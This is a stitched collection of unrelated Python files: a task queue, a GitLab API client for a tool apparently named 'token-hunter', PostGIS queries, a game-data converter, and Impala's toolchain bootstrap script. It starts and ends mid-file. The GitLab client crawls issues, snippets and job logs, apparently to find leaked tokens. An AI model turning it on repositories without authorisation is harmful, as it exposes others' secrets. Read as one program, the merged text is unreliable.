    time.sleep(600)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from head import *
class Task():
    """
    A single unit of work with a direction, payload frame and unique id.
    """
    def __init__(self, birth_type = BIRTH_TYPE_AUTO, frame = '', birth_time = None):
        """Create a task.

        birth_type -- initial task direction (UP/DOWN).
        frame -- raw task data packet.
        birth_time -- creation timestamp; defaults to now. BUG FIX: the
            original signature used ``birth_time=datetime.now()`` (evaluated
            once at import time) and then ignored the parameter entirely,
            always storing a fresh ``datetime.now()``. The caller-supplied
            value is now honored.
        """
        #: initial task direction (UP/DOWN)
        self.birth_type = birth_type
        #: file descriptor of the source socket (used to look up the
        #: connection handle in the connection dict)
        self.birth_fileno = -1
        #: protocol version number
        self.version = -1
        #: task data packet
        self.frame = frame
        #: creation time
        self.birth_time = birth_time if birth_time is not None else datetime.now()
        #: task state
        self.state = TASK_READY
        #: allocate the task id
        self.gene_id()
    def gene_id(self):
        """Atomically assign the next global task id to this task.

        The counter wraps back to 0 once it exceeds MAX_TASK_ID.
        """
        # `with` releases the lock even if an exception occurs (the original
        # acquire/release pair would leak the lock on error).
        with GlobalTaskId.lock:
            if GlobalTaskId.global_task_id > MAX_TASK_ID:
                GlobalTaskId.global_task_id = 0
            self.id = GlobalTaskId.global_task_id
            GlobalTaskId.global_task_id += 1
class TaskList():
    """Registry of pending tasks keyed by task id, guarded by task_condition."""
    #: task table: id -> Task. NOTE(review): class attribute, shared by all
    #: instances — looks intentional since a single global list is used.
    task_list = {}
    def add(self, one_task):
        """
        Add a task.
        :param one_task: task to insert, a Task instance
        :rtype: SUC on success, FAI on failure
        """
        # NOTE(review): a blocking Condition.acquire() always returns True,
        # so the else/FAI branch below is effectively unreachable — confirm
        # whether a timed acquire was intended.
        if task_condition.acquire():
            self.task_list[one_task.id] = one_task
            # Wake any workers waiting for new tasks.
            task_condition.notifyAll()
            task_condition.release()
            log_msg = 'One task added'
            log_handler.debug(log_msg)
            return SUC
        else:
            log_msg = 'Adding one task failed, task_id: %d' %(one_task.id)
            log_handler.error(log_msg)
            return FAI
    def remove(self, task_id):
        """
        Remove a task by id; a missing id is logged, not raised.
        :param task_id: id of the task to delete
        :rtype: NULL
        """
        # ERROR************
        # NOTE(review): unlike add(), removal is NOT done under
        # task_condition — confirm whether that is safe for the callers.
        try:
            self.task_list.pop(task_id)
            log_msg = '[ Task Deliver ] Remove one task, id : %d' %(task_id)
            # log_manager.add_work_log(log_msg, sys._getframe().f_code.co_name)
            log_handler.work(log_msg)
        except KeyError:
            log_msg = 'In remove task key error'
            log_handler.error(log_msg)
class GlobalTaskId:
    """Process-wide task-id counter plus the lock guarding it."""
    global_task_id = 0
    lock = threading.Lock()
# Condition variable used to signal workers when tasks are added.
task_condition = threading.Condition(threading.Lock())
# The single shared task registry.
global_task_list = TaskList()
if __name__ == "__main__":
    # Smoke test: create three tasks, register them, then drain the list.
    task1 = Task()
    task2 = Task()
    task3 = Task()
    task1.task_id = 1
    task2.task_id = 2
    task3.task_id = 3
    global_task_list.add(task1)
    global_task_list.add(task2)
    global_task_list.add(task3)
    # print(...) is valid on Python 2 as well as 3 (the original used
    # py2-only print statements).
    print(len(global_task_list.task_list))
    # BUG FIX (py3-compat): copy the keys before mutating — iterating a
    # live dict view while removing entries raises RuntimeError on
    # Python 3 (py2's .keys() already returned a copy).
    for key in list(global_task_list.task_list.keys()):
        print('To remove task %d' % key)
        global_task_list.remove(key)
    print(len(global_task_list.task_list))
|
import os
import re
from logging import warning, error
import requests
from api import http
from utilities import types, constants
def build_session():
    """Create a requests session preconfigured for the GitLab API.

    Applies the PRIVATE-TOKEN header from the environment, plus any
    proxy and client-certificate settings from the command-line args.
    """
    command_args = types.Arguments()

    # No cert configured -> default verification (True).
    cert = command_args.cert if command_args.cert else True
    proxies = (
        {"http": command_args.proxy, "https": command_args.proxy}
        if command_args.proxy
        else {}
    )

    session = requests.session()
    session.headers.update({
        "PRIVATE-TOKEN": os.getenv(constants.Environment.gitlab_api_token()),
        "USER-AGENT": "token-hunter",
    })
    session.proxies = proxies
    session.verify = cert
    return session
def args():
    """Return a fresh types.Arguments instance (parsed command-line args)."""
    return types.Arguments()
class GitLab:
    """Minimal GitLab REST API v4 client with transparent pagination.

    Results are paged via the Link response header; when the --depth
    argument is set, paging stops once that many results are collected.
    """
    def __init__(self, base_url, session_builder=build_session, get_args=args):
        self.http = http.Http(session_builder)
        self.base_url = base_url + "/api/v4"
        self.visited_urls = {}
        # Extracts the next-page URL from a Link header entry <url>; rel="next"
        self.next_page_regex = re.compile(r'<([^<>]*?)>; rel="next"')
        self.args = get_args()
    def get_project_details(self, project):
        return self.get('{}/projects/{}'.format(self.base_url, project))
    def get_merge_request_comments(self, project_id, mr_id):
        return self.get('{}/projects/{}/merge_requests/{}/discussions'.format(self.base_url, project_id, mr_id))
    def get_jobs(self, project_id):
        return self.get('{}/projects/{}/jobs?scope=success&scope=failed'.format(self.base_url, project_id))
    def get_job_logs(self, project_id, job_id):
        return self.get('{}/projects/{}/jobs/{}/trace'.format(self.base_url, project_id, job_id))
    def get_merge_requests(self, project_id):
        return self.get('{}/projects/{}/merge_requests'.format(self.base_url, project_id))
    def get_issue_comments(self, project_id, issue_id):
        return self.get('{}/projects/{}/issues/{}/discussions'.format(self.base_url, project_id, issue_id))
    def get_issues(self, project_id):
        return self.get('{}/projects/{}/issues'.format(self.base_url, project_id))
    def get_project_snippets(self, project):
        return self.get('{}/projects/{}/snippets'.format(self.base_url, project))
    def get_snippet_raw(self, snippet_id):
        return self.get('{}/snippets/{}/raw?line_ending=raw'.format(self.base_url, snippet_id))
    def get_personal_projects(self, member):
        return self.get('{}/users/{}/projects'.format(self.base_url, member))
    def get_group_projects(self, group):
        return self.get('{}/groups/{}/projects'.format(self.base_url, group))
    def get_group(self, group):
        return self.get('{}/groups/{}'.format(self.base_url, group))
    def get_group_members(self, group):
        return self.get('{}/groups/{}/members'.format(self.base_url, group))
    def get_project_members(self, project):
        return self.get('{}/projects/{}/members'.format(self.base_url, project))
    def get_current_user(self):
        """Return the authenticated user's username, or False on failure."""
        details = self.get('{}/user'.format(self.base_url))
        if not details:
            return False
        username = details['username']
        return username
    def __add_current_results__(self, all_results, current_results):
        """Append the current page of results to the accumulated list.

        Returns a dict with "combined_results" (truncated to self.args.depth
        when a depth limit is set) and "continue", which tells the pagination
        loop whether more pages should be fetched.
        """
        if self.args.depth is None:
            return {
                "combined_results": [*all_results, *current_results],
                "continue": True,
            }
        results = [*all_results, *current_results]
        if len(results) < self.args.depth:
            return {
                "combined_results": results,
                "continue": True,
            }
        # BUG FIX: the original computed `del results[depth - len(results):]`,
        # which deletes EVERYTHING when len(results) == depth (del results[0:]).
        # Truncating at the depth index keeps exactly the first `depth`
        # results in every case.
        del results[self.args.depth:]
        return {
            "combined_results": results,
            "continue": False,
        }
    def __build_paged_results__(self, response):
        """Follow Link rel="next" headers, accumulating results per page."""
        all_results = []
        result = self.__add_current_results__(all_results, response.json())
        all_results += result["combined_results"]
        if result["continue"]:
            while 'Link' in response.headers and 'rel="next"' in response.headers['Link']:
                next_url = re.findall(self.next_page_regex, response.headers['Link'])[0]
                response = self.http.get_with_retry_and_paging_adjustment(next_url)
                if response.status_code == 200:
                    result = self.__add_current_results__(all_results, response.json())
                    all_results = result["combined_results"]
                    if not result["continue"]:
                        break
                else:
                    warning("[!] Response %s processing pagination URL: %s", response.status_code, next_url)
        return all_results
    def get(self, url):
        """
        Helper function to interact with GitLab API using python requests
        The important things here are:
            - Adding the PRIVATE-TOKEN header based on env variable
            - interacting with the pagination process via LINK headers
              (https://docs.gitlab.com/ee/api/README.html#pagination)
        """
        response = self.http.get_with_retry_and_paging_adjustment(url)
        if not (response and response.status_code == 200):
            # BUG FIX: the original dereferenced response.status_code here
            # even when no response object came back, raising AttributeError
            # instead of logging the failure.
            status = response.status_code if response is not None else "no response"
            error("[!] Response %s received from %s. Skipping.", status, url)
            return False
        if 'Link' not in response.headers:
            return response.json() if response.headers["Content-Type"] == "application/json" else response.text
        return self.__build_paged_results__(response)
|
#!/usr/bin/env python
# -----------------------------------------------------------------------
# user.py
# Author: Sophie Li, Jayson Wu, Connie Xu
# -----------------------------------------------------------------------
class User:
    """Immutable-by-convention record of a user's name, netid, and email.

    The email is normalized to lower case at construction time.
    """

    def __init__(self, name, netid, email):
        self._name = name
        self._netid = netid
        # Lower-case so comparisons/lookups are case-insensitive.
        self._email = email.lower()

    def __str__(self):
        fields = ('name: ' + self._name,
                  'netid: ' + self._netid,
                  'email: ' + self._email)
        return '\n'.join(fields)

    def getName(self):
        """Return the user's display name."""
        return self._name

    def getNetID(self):
        """Return the user's netid."""
        return self._netid

    def getEmail(self):
        """Return the user's normalized (lower-case) email address."""
        return self._email
|
def parse_line(line):
    """Determine syllables/stress for all words in a line.

    Tokenizes the line with the module-level ``nlp`` tokenizer, lower-cases
    each token, then both looks each word up in the dictionary and computes a
    syllabification, so the two can be compared.

    Returns [dictionary_words, calculated_words], or None for an empty line.
    """
    if len(line) < 1:
        return None  # nothing to do
    word_tokens = nlp(line)
    # NOTE(review): assumes tokens expose a .lower() method; spaCy tokens use
    # the .lower_ attribute instead -- confirm what ``nlp`` actually returns.
    words_lower = [word.lower() for word in word_tokens]
    # BUG FIXES vs. original: `elif len(line >=1):` compared a str to an int
    # inside len() (TypeError on every non-empty line), and the two
    # comprehensions iterated over the undefined name `word_lower` (typo for
    # `words_lower`).
    dictionary_words = [dictionary_lookup(word) for word in words_lower]
    calculated_words = [calculate_syllables(word) for word in words_lower]
    return [dictionary_words, calculated_words]
# Demo: parse a sample line at import/run time (result is discarded).
line = "Hi there, this is a line of text."
parse_line(line)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Module version of this query collection.
__version__ = '1.0.1'

# List all non-deleted nvl_point rows, optionally filtered by user id ($1)
# and by a label substring/prefix match ($2). Coordinates are flipped
# (lat/lon <-> lon/lat) via PostGIS ST_FlipCoordinates.
# NOTE(review): the prefix predicate `npt.label ILIKE $2 || '%'` appears
# twice and is subsumed by the '%..%' contains predicate -- likely redundant;
# left untouched because the query text is runtime behavior.
get_nvl_point_list_query = """
SELECT npt.id AS id,
ST_FlipCoordinates(npt.geom)::geometry AS geom,
npt.label AS label,
npt.color AS color,
npt.icon AS icon,
npt.location_id AS location_id,
npt.user_id AS user_id,
npt.active AS active,
npt.deleted AS deleted
FROM public.nvl_point AS npt
LEFT OUTER JOIN public.location AS nloc ON nloc.id = npt.location_id
LEFT OUTER JOIN public.user AS usr ON usr.id = npt.user_id
WHERE npt.deleted is FALSE
AND ($1::BIGINT is NULL OR npt.user_id = $1::BIGINT)
AND (
$2::VARCHAR is NULL OR
npt.label ILIKE $2::VARCHAR || '%' OR
npt.label ILIKE '%' || $2::VARCHAR || '%' OR
npt.label ILIKE $2::VARCHAR || '%')
"""

# Count of rows matching the same filters as get_nvl_point_list_query
# (used for pagination totals; keep the WHERE clauses in sync).
get_nvl_point_list_count_query = """
SELECT count(*) AS nvl_point_count
FROM public.nvl_point AS npt
LEFT OUTER JOIN public.location AS nloc ON nloc.id = npt.location_id
LEFT OUTER JOIN public.user AS usr ON usr.id = npt.user_id
WHERE npt.deleted is FALSE
AND ($1::BIGINT is NULL OR npt.user_id = $1::BIGINT)
AND (
$2::VARCHAR is NULL OR
npt.label ILIKE $2::VARCHAR || '%' OR
npt.label ILIKE '%' || $2::VARCHAR || '%' OR
npt.label ILIKE $2::VARCHAR || '%')
"""

# Fetch one nvl_point by id ($2), optionally scoped to a user ($1).
get_nvl_point_element_query = """
SELECT npt.id AS id,
ST_FlipCoordinates(npt.geom)::geometry AS geom,
npt.label AS label,
npt.color AS color,
npt.icon AS icon,
npt.location_id AS location_id,
npt.user_id AS user_id,
npt.active AS active,
npt.deleted AS deleted
FROM public.nvl_point AS npt
LEFT OUTER JOIN public.location AS nloc ON nloc.id = npt.location_id
LEFT OUTER JOIN public.user AS usr ON usr.id = npt.user_id
WHERE npt.deleted is FALSE
AND ($1::BIGINT is NULL OR npt.user_id = $1::BIGINT)
AND npt.id = $2::BIGINT
"""

# Fetch the most recently created nvl_point for a location ($2),
# optionally scoped to a user ($1).
get_nvl_point_element_by_location_id_query = """
SELECT npt.id AS id,
ST_FlipCoordinates(npt.geom)::geometry AS geom,
npt.label AS label,
npt.color AS color,
npt.icon AS icon,
npt.location_id AS location_id,
npt.user_id AS user_id,
npt.active AS active,
npt.deleted AS deleted
FROM public.nvl_point AS npt
LEFT OUTER JOIN public.location AS nloc ON nloc.id = npt.location_id
LEFT OUTER JOIN public.user AS usr ON usr.id = npt.user_id
WHERE npt.deleted is FALSE
AND ($1::BIGINT is NULL OR npt.user_id = $1::BIGINT)
AND npt.location_id = $2::BIGINT
ORDER BY npt.created_on DESC LIMIT 1
"""

# List map-visible points for a user ($1) with joined location/type/user
# metadata, newest first. Only non-deleted points on non-deleted locations
# with show_on_map set are returned.
get_nvl_point_list_by_user_id_query = """
SELECT npt.id AS id,
ST_FlipCoordinates(npt.geom)::geometry AS geom,
npt.label AS label,
npt.color AS color,
npt.location_id AS location_id,
npt.user_id AS user_id,
npt.icon AS icon,
loc.location_type_id AS location_type_id,
ltp.name AS location_type,
loc.user_id AS user_id,
loc.name AS location_name,
usr.fullname AS user_fullname,
loc.show_on_map AS show_on_map,
npt.active AS active,
npt.deleted AS deleted
FROM public.nvl_point AS npt
LEFT OUTER JOIN public.location AS loc ON loc.id = npt.location_id
LEFT OUTER JOIN public.location_type AS ltp ON ltp.id = loc.location_type_id
LEFT OUTER JOIN public.user AS usr ON usr.id = npt.user_id
WHERE npt.deleted is FALSE
AND loc.deleted is FALSE
AND ($1::BIGINT is NULL OR npt.user_id = $1::BIGINT)
AND loc.show_on_map IS TRUE
ORDER BY npt.created_on DESC
"""
#!/usr/bin/env python
from fabricate import *
import sys
def output_file():
    """fabricate build target: copy 'input file' to 'output file' (both
    file names deliberately contain a space)."""
    run('cp','input file','output file')

# fabricate maps command-line target names to Python function names, but
# identifiers cannot contain spaces, so rewrite the 'output file' argument
# to 'output_file' before handing control to fabricate's main().
# Hacky, perhaps a bug that can be fixed by fabricate?
for i, x in enumerate(sys.argv):
    if x == 'output file':
        sys.argv[i] = 'output_file'

main()
|
def convertArmor(armor):
    """Flatten a raw armor record into a flat dict suitable for DB insertion.

    ``armor`` must support .get() with keys: id, Price, Part, Rarity, Slot,
    Type, Gender, Defense (nested mapping), Fire/Dragon/Water/Thunder/Ice,
    and Name. Numeric fields are converted to int; the name has single
    quotes doubled for SQL-literal escaping.
    """
    convertedArmor = {}
    convertedArmor['id'] = int(armor.get('id'))
    convertedArmor['price'] = armor.get('Price')
    convertedArmor['part'] = armor.get('Part')
    convertedArmor['rarity'] = int(armor.get('Rarity'))
    convertedArmor['slot'] = int(armor.get('Slot'))
    convertedArmor['type'] = armor.get('Type')
    convertedArmor['gender'] = armor.get('Gender')
    __extractDefense(convertedArmor, armor)
    __extractResistances(convertedArmor, armor)
    # Double single quotes so the name is safe inside a SQL string literal.
    convertedArmor['name'] = armor.get('Name').replace("'", "''")
    return convertedArmor

def __extractDefense(armorMap, armor):
    """Copy initial/max defense into armorMap, defaulting to -1 when the
    Defense mapping is missing or a value is absent/non-numeric."""
    # BUG FIX: these were bare ``except:`` clauses, which also swallowed
    # SystemExit/KeyboardInterrupt; narrowed to the failures a missing or
    # malformed field actually raises.
    try:
        initial = int(armor.get('Defense').get('initial'))
    except (AttributeError, TypeError, ValueError):
        initial = -1
    try:
        maximum = int(armor.get('Defense').get('max'))
    except (AttributeError, TypeError, ValueError):
        maximum = -1
    armorMap['defense_init'] = initial
    armorMap['defense_max'] = maximum

def __extractResistances(armorMap, armor):
    """Copy the five elemental resistances into armorMap as ints."""
    armorMap['fire'] = int(armor.get('Fire'))
    armorMap['dragon'] = int(armor.get('Dragon'))
    armorMap['water'] = int(armor.get('Water'))
    armorMap['thunder'] = int(armor.get('Thunder'))
    armorMap['ice'] = int(armor.get('Ice'))
def convertSkills(armor):
    """Return one row dict per skill on the armor piece, pairing the armor id
    with each skill's id, SQL-escaped name, and value."""
    return [
        {
            'id': int(armor.get('id')),
            'skill_id': int(skill.get('id')),
            # Double single quotes for SQL string literals.
            'name': skill.get('Name').replace("'", "''"),
            'value': int(skill.get('Value')),
        }
        for skill in armor.get('Skills')
    ]
def convertCrafting(armor):
    """Return one row dict per crafting material required by the armor piece,
    pairing the armor id with each item's id, SQL-escaped name, and quantity."""
    return [
        {
            'id': int(armor.get('id')),
            'item_id': int(item.get('id')),
            # Double single quotes for SQL string literals.
            'name': item.get('Name').replace("'", "''"),
            'quantity': int(item.get('Quantity')),
        }
        for item in armor.get('Crafting Items')
    ]
#!/usr/bin/env impala-python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# The purpose of this script is to download prebuilt binaries and jar files to satisfy the
# third-party dependencies for Impala. The script checks for the presence of IMPALA_HOME
# and IMPALA_TOOLCHAIN. IMPALA_HOME indicates that the environment is correctly setup and
# that we can deduce the version settings of the dependencies from the environment.
# IMPALA_TOOLCHAIN indicates the location where the prebuilt artifacts should be extracted
# to. If DOWNLOAD_CDH_COMPONENTS is set to true, this script will also download and extract
# the CDH components (i.e. Hadoop, Hive, HBase and Sentry) into
# CDH_COMPONENTS_HOME.
#
# By default, packages are downloaded from an S3 bucket named native-toolchain.
# The exact URL is based on IMPALA_<PACKAGE>_VERSION environment variables
# (configured in impala-config.sh) as well as the OS version being built on.
# The URL can be overridden with an IMPALA_<PACKAGE>_URL environment variable
# set in impala-config-{local,branch}.sh.
#
# The script is called as follows without any additional parameters:
#
# python bootstrap_toolchain.py
import logging
import os
import random
import re
import sh
import shutil
import subprocess
import sys
import tempfile
import time
# Base URL of the S3 bucket that hosts prebuilt toolchain packages.
HOST = "https://native-toolchain.s3.amazonaws.com/build"

# Maps lsb_release-derived OS identifiers to the package label embedded in
# toolchain artifact file names. Several newer Ubuntu releases and SLES
# variants reuse an older release's packages.
OS_MAPPING = {
  "centos6" : "ec2-package-centos-6",
  "centos5" : "ec2-package-centos-5",
  "centos7" : "ec2-package-centos-7",
  "redhatenterpriseserver5" : "ec2-package-centos-5",
  "redhatenterpriseserver6" : "ec2-package-centos-6",
  "redhatenterpriseserver7" : "ec2-package-centos-7",
  "debian6" : "ec2-package-debian-6",
  "debian7" : "ec2-package-debian-7",
  "debian8" : "ec2-package-debian-8",
  "suselinux11": "ec2-package-sles-11",
  "suselinux12": "ec2-package-sles-12",
  "suse12.2": "ec2-package-sles-12",
  "ubuntu12.04" : "ec2-package-ubuntu-12-04",
  "ubuntu14.04" : "ec2-package-ubuntu-14-04",
  "ubuntu15.04" : "ec2-package-ubuntu-14-04",
  "ubuntu15.10" : "ec2-package-ubuntu-14-04",
  "ubuntu16.04" : "ec2-package-ubuntu-16-04",
}
class Package(object):
  """
  Represents a package to be downloaded. A version, if not specified
  explicitly, is retrieved from the environment variable IMPALA_<NAME>_VERSION.
  URLs are retrieved from IMPALA_<NAME>_URL, but are optional.
  """
  def __init__(self, name, version=None, url=None):
    self.name = name
    self.version = version
    self.url = url
    # e.g. "tpc-h" -> "TPC_H" for the environment-variable lookup.
    env_name = name.replace("-", "_").upper()
    if self.version is None:
      version_var = "IMPALA_{0}_VERSION".format(env_name)
      self.version = os.environ.get(version_var)
      if not self.version:
        raise Exception("Could not find version for {0} in environment var {1}".format(
            name, version_var))
    if self.url is None:
      self.url = os.environ.get("IMPALA_{0}_URL".format(env_name))
def try_get_platform_release_label():
  """Gets the right package label from the OS version. Return None if not found."""
  try:
    return get_platform_release_label()
  except Exception:
    # BUG FIX: narrowed from a bare ``except:`` so KeyboardInterrupt and
    # SystemExit still propagate; any lookup failure maps to None.
    return None
# Cache "lsb_release -irs" to avoid excessive logging from sh, and
# to shave a little bit of time.
lsb_release_cache = None

def get_platform_release_label(release=None):
  """Gets the right package label from the OS version. Raise exception if not found.
  'release' can be provided to override the underlying OS version.
  """
  global lsb_release_cache
  if not release:
    if lsb_release_cache:
      release = lsb_release_cache
    else:
      # Normalize "Distributor\nRelease" output to e.g. "centos7.2".
      release = "".join(map(lambda x: x.lower(), sh.lsb_release("-irs").split()))
      # Only need to check against the major release if RHEL or CentOS
      for platform in ['centos', 'redhatenterpriseserver']:
        if platform in release:
          release = release.split('.')[0]
          break
      lsb_release_cache = release
  # NOTE: dict.iteritems() ties this module to Python 2.
  for k, v in OS_MAPPING.iteritems():
    if re.search(k, release):
      return v
  raise Exception("Could not find package label for OS version: {0}.".format(release))
def wget_and_unpack_package(download_path, file_name, destination, wget_no_clobber):
  """Download ``download_path`` into ``destination`` (retrying on failure)
  and extract the tarball there; the tarball itself is removed afterwards.

  Raises when the URL does not end in ``file_name`` or when all download
  attempts fail.
  """
  if not download_path.endswith("/" + file_name):
    raise Exception("URL {0} does not match with expected file_name {1}"
        .format(download_path, file_name))
  NUM_ATTEMPTS = 3
  for attempt in range(1, NUM_ATTEMPTS + 1):
    logging.info("Downloading {0} to {1}/{2} (attempt {3})".format(
        download_path, destination, file_name, attempt))
    # --no-clobber avoids downloading the file if a file with the name already exists
    try:
      sh.wget(download_path, directory_prefix=destination, no_clobber=wget_no_clobber)
      break
    except Exception, e:  # Python 2 syntax; re-raises after the final attempt
      if attempt == NUM_ATTEMPTS:
        raise
      logging.error("Download failed; retrying after sleep: " + str(e))
      time.sleep(10 + random.random() * 5) # Sleep between 10 and 15 seconds.
  logging.info("Extracting {0}".format(file_name))
  sh.tar(z=True, x=True, f=os.path.join(destination, file_name), directory=destination)
  sh.rm(os.path.join(destination, file_name))
def download_package(destination, package, compiler, platform_release=None):
  """Download and unpack one toolchain package into ``destination``.

  Any previously extracted copy is removed first. The download URL is the
  package's explicit URL when set, otherwise it is derived from the
  toolchain build id, package name/version, compiler, and platform label.
  ``platform_release`` overrides the detected OS label.
  """
  remove_existing_package(destination, package.name, package.version)
  build_id = os.environ["IMPALA_TOOLCHAIN_BUILD_ID"]
  label = get_platform_release_label(release=platform_release)
  file_name = "{0}-{1}-{2}-{3}.tar.gz".format(
      package.name, package.version, compiler, label)
  if package.url is None:
    download_path = "{0}/{1}/{2}/{3}-{4}/{5}".format(
        HOST, build_id, package.name, package.version, compiler, file_name)
  else:
    download_path = package.url
  wget_and_unpack_package(download_path, file_name, destination, True)
def bootstrap(toolchain_root, packages):
  """Downloads and unpacks each package in the list `packages` into `toolchain_root` if it
  doesn't exist already.
  """
  # Unknown platform: fall back to requiring a pre-built custom toolchain.
  if not try_get_platform_release_label():
    check_custom_toolchain(toolchain_root, packages)
    return
  # Detect the compiler
  compiler = "gcc-{0}".format(os.environ["IMPALA_GCC_VERSION"])
  def handle_package(p):
    # Fetch (or stub out, for unsupported Kudu) one package, then record
    # the extracted version in its marker file.
    if check_for_existing_package(toolchain_root, p.name, p.version, compiler):
      return
    if p.name != "kudu" or os.environ["KUDU_IS_SUPPORTED"] == "true":
      download_package(toolchain_root, p, compiler)
    else:
      build_kudu_stub(toolchain_root, p.version, compiler)
    write_version_file(toolchain_root, p.name, p.version, compiler,
        get_platform_release_label())
  execute_many(handle_package, packages)
def check_output(cmd_args):
  """Run the command and return the output. Raise an exception if the command returns
  a non-zero return code. Similar to subprocess.check_output() which is only provided
  in python 2.7.
  """
  proc = subprocess.Popen(cmd_args, stdout=subprocess.PIPE,
                          stderr=subprocess.STDOUT)
  output, _ = proc.communicate()
  if proc.wait() != 0:
    raise Exception("Command with args '%s' failed with exit code %s:\n%s"
        % (cmd_args, proc.returncode, output))
  return output
def package_directory(toolchain_root, pkg_name, pkg_version):
  """Return the directory a package extracts to: <root>/<name>-<version>."""
  return os.path.join(toolchain_root, "{0}-{1}".format(pkg_name, pkg_version))

def version_file_path(toolchain_root, pkg_name, pkg_version):
  """Return the marker file recording an extracted package's exact version."""
  pkg_dir = package_directory(toolchain_root, pkg_name, pkg_version)
  return os.path.join(pkg_dir, "toolchain_package_version.txt")
def check_custom_toolchain(toolchain_root, packages):
  """Verify a hand-built toolchain: every package directory must already
  exist under ``toolchain_root``. Logs all missing packages and raises if
  any are absent."""
  missing = []
  for p in packages:
    pkg_dir = package_directory(toolchain_root, p.name, p.version)
    if not os.path.isdir(pkg_dir):
      missing.append((p, pkg_dir))
  if missing:
    # Report every missing package at once rather than failing on the first.
    msg = "The following packages are not in their expected locations.\n"
    for p, pkg_dir in missing:
      msg += "  %s (expected directory %s to exist)\n" % (p, pkg_dir)
    msg += "Pre-built toolchain archives not available for your platform.\n"
    msg += "Clone and build native toolchain from source using this repository:\n"
    msg += "    https://github.com/cloudera/native-toolchain\n"
    logging.error(msg)
    raise Exception("Toolchain bootstrap failed: required packages were missing")
def check_for_existing_package(toolchain_root, pkg_name, pkg_version, compiler):
  """Return true if toolchain_root already contains the package with the correct
  version and compiler.
  """
  version_file = version_file_path(toolchain_root, pkg_name, pkg_version)
  if not os.path.exists(version_file):
    return False
  expected = "{0}-{1}-{2}-{3}".format(
      pkg_name, pkg_version, compiler, get_platform_release_label())
  with open(version_file) as f:
    return f.read().strip() == expected
def write_version_file(toolchain_root, pkg_name, pkg_version, compiler, label):
  """Record the exact extracted package version string in its marker file."""
  marker = version_file_path(toolchain_root, pkg_name, pkg_version)
  with open(marker, 'w') as f:
    f.write("{0}-{1}-{2}-{3}".format(pkg_name, pkg_version, compiler, label))
def remove_existing_package(toolchain_root, pkg_name, pkg_version):
  """Delete any previously extracted copy of the package, if present."""
  pkg_dir = package_directory(toolchain_root, pkg_name, pkg_version)
  if not os.path.exists(pkg_dir):
    return
  logging.info("Removing existing package directory {0}".format(pkg_dir))
  shutil.rmtree(pkg_dir)
def build_kudu_stub(toolchain_root, kudu_version, compiler):
  """Replace the real Kudu client library with a crash-on-call stub.

  Downloads the CentOS 7 Kudu package, extracts the exported symbols from a
  real client .so, generates C++ source defining each symbol as a function
  that crashes, compiles it (preserving the original SONAME), and overwrites
  every client lib with the stub. GetShortVersionString() is redefined to
  return a sentinel so callers can detect the stub.
  """
  # When Kudu isn't supported, the CentOS 7 package will be downloaded and the client
  # lib will be replaced with a stubbed client.
  download_package(toolchain_root, Package("kudu", kudu_version), compiler,
      platform_release="centos7")
  # Find the client lib files in the extracted dir. There may be several files with
  # various extensions. Also there will be a debug version.
  kudu_dir = package_directory(toolchain_root, "kudu", kudu_version)
  client_lib_paths = []
  for path, _, files in os.walk(kudu_dir):
    for file in files:
      if not file.startswith("libkudu_client.so"):
        continue
      file_path = os.path.join(path, file)
      # Symlinks are skipped; only real files are replaced later.
      if os.path.islink(file_path):
        continue
      client_lib_paths.append(file_path)
  if not client_lib_paths:
    raise Exception("Unable to find Kudu client lib under '%s'" % kudu_dir)
  # The client stub will be create by inspecting a real client and extracting the
  # symbols. The choice of which client file to use shouldn't matter.
  client_lib_path = client_lib_paths[0]
  # Use a newer version of binutils because on older systems the default binutils may
  # not be able to read the newer binary.
  binutils_dir = package_directory(
      toolchain_root, "binutils", os.environ["IMPALA_BINUTILS_VERSION"])
  nm_path = os.path.join(binutils_dir, "bin", "nm")
  objdump_path = os.path.join(binutils_dir, "bin", "objdump")
  # Extract the symbols and write the stubbed client source. There is a special method
  # kudu::client::GetShortVersionString() that is overridden so that the stub can be
  # identified by the caller.
  get_short_version_sig = "kudu::client::GetShortVersionString()"
  nm_out = check_output([nm_path, "--defined-only", "-D", client_lib_path])
  stub_build_dir = tempfile.mkdtemp()
  stub_client_src_file = open(os.path.join(stub_build_dir, "kudu_client.cc"), "w")
  try:
    # The stub preamble: a sentinel version string plus a deliberate
    # null-pointer write so any stubbed call crashes immediately.
    stub_client_src_file.write("""
#include <string>
static const std::string kFakeKuduVersion = "__IMPALA_KUDU_STUB__";
static void KuduNotSupported() {
  *((char*)0) = 0;
}
namespace kudu { namespace client {
std::string GetShortVersionString() { return kFakeKuduVersion; }
}}
""")
    found_start_version_symbol = False
    cpp_filt_path = os.path.join(binutils_dir, "bin", "c++filt")
    for line in nm_out.splitlines():
      addr, sym_type, mangled_name = line.split(" ")
      # Skip special functions an anything that isn't a strong symbol. Any symbols that
      # get passed this check must be related to Kudu. If a symbol unrelated to Kudu
      # (ex: a boost symbol) gets defined in the stub, there's a chance the symbol could
      # get used and crash Impala.
      if mangled_name in ["_init", "_fini"] or sym_type not in "Tt":
        continue
      demangled_name = check_output([cpp_filt_path, mangled_name]).strip()
      assert "kudu" in demangled_name, \
          "Symbol doesn't appear to be related to Kudu: " + demangled_name
      if demangled_name == get_short_version_sig:
        found_start_version_symbol = True
        continue
      stub_client_src_file.write("""
extern "C" void %s() {
  KuduNotSupported();
}
""" % mangled_name)
    if not found_start_version_symbol:
      raise Exception("Expected to find symbol a corresponding to"
          " %s but it was not found." % get_short_version_sig)
    stub_client_src_file.flush()
    # The soname is needed to avoid problem in packaging builds. Without the soname,
    # the library dependency as listed in the impalad binary will be a full path instead
    # of a short name. Debian in particular has problems with packaging when that happens.
    objdump_out = check_output([objdump_path, "-p", client_lib_path])
    # for/else: the else-branch runs only when no SONAME line was found.
    for line in objdump_out.splitlines():
      if "SONAME" not in line:
        continue
      # The line that needs to be parsed should be something like:
      # "  SONAME               libkudu_client.so.0"
      so_name = line.split()[1]
      break
    else:
